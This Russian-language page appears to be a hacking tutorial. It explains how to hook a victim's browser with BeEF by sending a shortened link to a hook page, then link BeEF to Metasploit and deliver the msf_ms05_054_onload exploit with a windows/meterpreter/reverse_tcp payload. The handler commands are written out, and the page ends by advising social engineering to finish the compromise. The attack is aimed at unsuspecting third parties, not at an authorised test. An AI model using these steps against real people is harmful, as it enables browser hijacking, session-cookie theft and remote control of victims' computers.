full

full

Х а к е р

Взлом устройств

//


Каждый раз переходя по ссылке вы можете не подозревать, но на вашем устройстве после перехода могут находится вредоносные программы а ваши персональные данные могут быть похищены.


Перехват куки. И соответственно перехват сессий ваших аккаунтов с браузера.


Куки — небольшой фрагмент данных, отправленный веб-сервером и хранимый на компьютере пользователя. Веб-клиент всякий раз при попытке открыть страницу соответствующего сайта пересылает этот фрагмент данных веб-серверу в составе HTTP-запроса.


Ваш IP и другие гео данные.
Подгрузить малварь-вымогатель или бэкдор.


Exploit pack - это своеобразная связка эксплойтов.

Эксплойт — компьютерная программа, фрагмент программного кода или последовательность команд, использующие уязвимости в программном обеспечении и применяемые для проведения атаки на вычислительную систему, простыми словами вирус.


Beef - это фреймворк для проведения XSS атак путем заражения и дальнейшего использования.


Metasploit - фреймворк для поиска и эксплуатации уязвимостей. То есть для проведения тестирования на проникновение.


Запуск beef.

В терминале пишем

beef-xss

Переходим по ссылке http://127.0.0.1:3000/ui/authentication

Теперь нужно авторизироватся. Логин и пароль по умолчанию beef:beef.

Нам нужно чтобы "жертва" выполнила у себя скрипт hook.js

Нужно подгрузить его ей.

http://<ваш ip>:3000/demos/basic.html

Далее сократите ссылку и скиньте пользователю. Как только он переходит по ссылке на панели управления beef в разделе Online browsers появится активный браузер. Это браузер нашего пользователя.

Половина дел сделано. Теперь подключим к нашей работе metasploit. Для этого:

  1. Открываем файл config.yaml у beef. Часто он находится в этой дериктории - /usr/share/beef-xss/
  2. Ищем там раздел extension. У metasploit меняем значение параметра на true
  1. Теперь же открываем файл /usr/share/beef-xss/extensions/metasploit/config.yaml и изменяем значение параметров у callback_host и host.
  2. Запускаем metasploit и пишем следующее
msf> load msgrpc

И снова открываем файл из пункта 3. В pass вписываем получившийся с генерированный пароль. Остается сохранить.

Переходим в /usr/share/beef-xss/ и пишем

./beef -x

После этого в beef загрузятся exploit'ы.

Теперь нам доступны exploit'ы которые мы тоже подгрузить пользователю и выполнить их. Для начала я хотел бы узнать какая ОС у моего пользователя.

И как видно на скриншоте - это windows.

Теперь переходим во вкладку Commands и ищем - msf_ms05_054_onload

Выберем payload. Так как у моей "жертвы" windows я выбрал - windows/meterpreter/reverse_tcp

Заполняем все поля.

Теперь открываем msf и пишем

1. use exploit/multi/handler
2. set payload windows/meterpreter/reverse_tcp
3. set LHOST <your_ip>
4. exploit

Во второй команде пишете название пайлоада который выбрали в beef.


Добавив к эксплойту чуточку СИ и ваша жертва взломана, но не стоит забывать что вас также могут взломать,будьте осторожнее.


Report Page